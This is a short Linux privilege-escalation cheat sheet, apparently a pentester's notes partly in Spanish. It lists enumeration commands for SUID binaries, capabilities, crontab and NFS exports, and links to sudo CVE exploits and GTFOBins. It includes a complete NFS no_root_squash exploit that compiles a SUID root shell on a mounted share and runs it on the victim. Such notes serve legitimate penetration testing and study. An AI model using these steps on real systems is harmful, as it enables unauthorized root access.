Linux Privesc

LD_Preload Privesc

Linux Privilege Escalation using LD_PreloadHacking Articles

Sudo binary privesc

Sudo <1.8.28

sudo 1.8.27 - Security BypassExploit Database

Sudo <1.8.30 y pwfeedback habilitado

GitHub - saleemrashid/sudo-cve-2019-18634: Proof of Concept for CVE-2019-18634GitHub

SUID

find / -perm -u=s -type f 2>/dev/null

Capabilities

getcap -r / 2>/dev/null

NFS Root Squashing

cat /etc/exports
#Si una carpeta tiene la flag “no_root_squash” se puede montar con NFS y los archivos serán creados como root (id 0)
#Desde la máquina atacante
showmount -e <IP_VÍCTIMA>
mkdir /tmp/mountme
mount -o rw,vers=2 <IP_VÍCTIMA>:/tmp /tmp/mountme
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }’ > /tmp/mountme/x.c
gcc /tmp/mountme/x.c -o /tmp/mountme/x
chmod +s /tmp/mountme/x
#Desde la máquina víctima
./x

Tareas programadas

cat /etc/crontab

PayloadsAllTheThings/Methodology and Resources/Linux - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Docker

docker | GTFOBinsgtfobins.github.io

Enlaces adicionales

GTFOBinsgtfobins.github.io

tar | GTFOBinsgtfobins.github.io